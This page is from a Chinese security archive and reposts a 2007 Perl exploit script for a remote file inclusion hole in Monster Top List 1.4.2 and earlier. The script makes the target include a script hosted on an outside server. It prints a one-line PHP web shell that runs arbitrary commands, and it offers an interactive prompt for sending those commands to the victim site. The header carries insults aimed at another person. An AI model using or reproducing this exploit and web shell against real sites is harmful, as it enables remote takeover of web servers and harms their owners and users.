首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Monster Top List <= 1.4.2 (functions.php root_path) RFI Exploit
来源:mafia@google.ro 作者:fluffy_bunny 发布时间:2007-03-21  
#!/usr/bin/perl
#
# Monster Top List <= 1.4.2 remote Command Execution Vulnerabilities
#
# Risk : High (Remote Code Execution)
#
# Url: http://www.monstertoplist.com
#
# Exploit:
#   http://site.com/[path]/sources/functions.php?root_path=[Evil_Script]
#
# (c)oded and f0und3d by fluffy_bunny
#
# Romanian Security Team .: hTTp://RSTZONE.NET :.
#
# t0 psyke[pwn]: "y0ur c0de suqz. y0ur s1t3 suqz. y0u sm3ll 0f sh33p f3c3z. 3y3 th1nk y0u n33d t0
#                t4k3 4n 0nl1n3 w3b d3s1gn c0urz3 0r s0m3th1ng. fuqn d0rk."

use LWP::Simple;

print "...........................[RST]...............................\n";
print ".                                                             .\n";
print ". Monster Top List <= 1.4.2 RFI spl0it                        .\n";
print ".                                                             .\n";
print "...............................................................\n";
print ".       Romanian Security Team -> hTTp://RSTZONE.NET          .\n";
print ".       [c]oded by fluffy_bunny - mafia@google.ro             .\n";
print "...............................................................\n\n";

my $kw3,$path,$shell,$conexiune,$cmd,$data ;


if ((!$ARGV[0]) || (!$ARGV[1])) { &usage;exit(0);}

$path = $ARGV[0];
chomp($path);
$shell = $ARGV[1];   
chomp($shell);
   
$path = $path."/sources/functions.php";


sub usage(){
    print "Usage    : perl $0 host/path http://site.com/cmd.txt\n\n";
    print "Example  : perl $0 http://127.0.0.1 http://site.com/cmd.txt\n\n";
    print 'Shell    : <?php ob_clean();ini_set("max_execution_time",0);passthru($_GET["cmd"]);die;?>';
}

while () 

print "[kw3rln].[rst] :~\$ ";
chomp($cmd=<STDIN>);
if ($cmd eq "exit") { exit(0);}

$kw3 = $path."?root_path=".$shell."?&cmd=".$cmd;
if ($cmd eq "")    
  { print "Enter your command !\n"; }
else
  { $data=get($kw3); print $data ; }
}

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·PHP <= 5.2.1 hash_update_file(
·Helix Server 11.0.1 Remote Hea
·phpRaid < 3.0.7 (rss.php phpra
·Grandstream Budge Tone-200 IP
·Mercur IMAPD 5.00.14 Remote De
·Mercur Messaging 2005 IMAP (SU
·Cisco 7940 SIP INVITE remote D
·Mercur Messaging 2005 SP3 IMAP
·PHP <= 4.4.6 / 5.2.1 ext/gd Al
·FutureSoft TFTP Server 2000 Re
·FTPDMIN 0.96 (LIST) Remote Den
·PortailPhp 2.0 (idnews) Remote
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved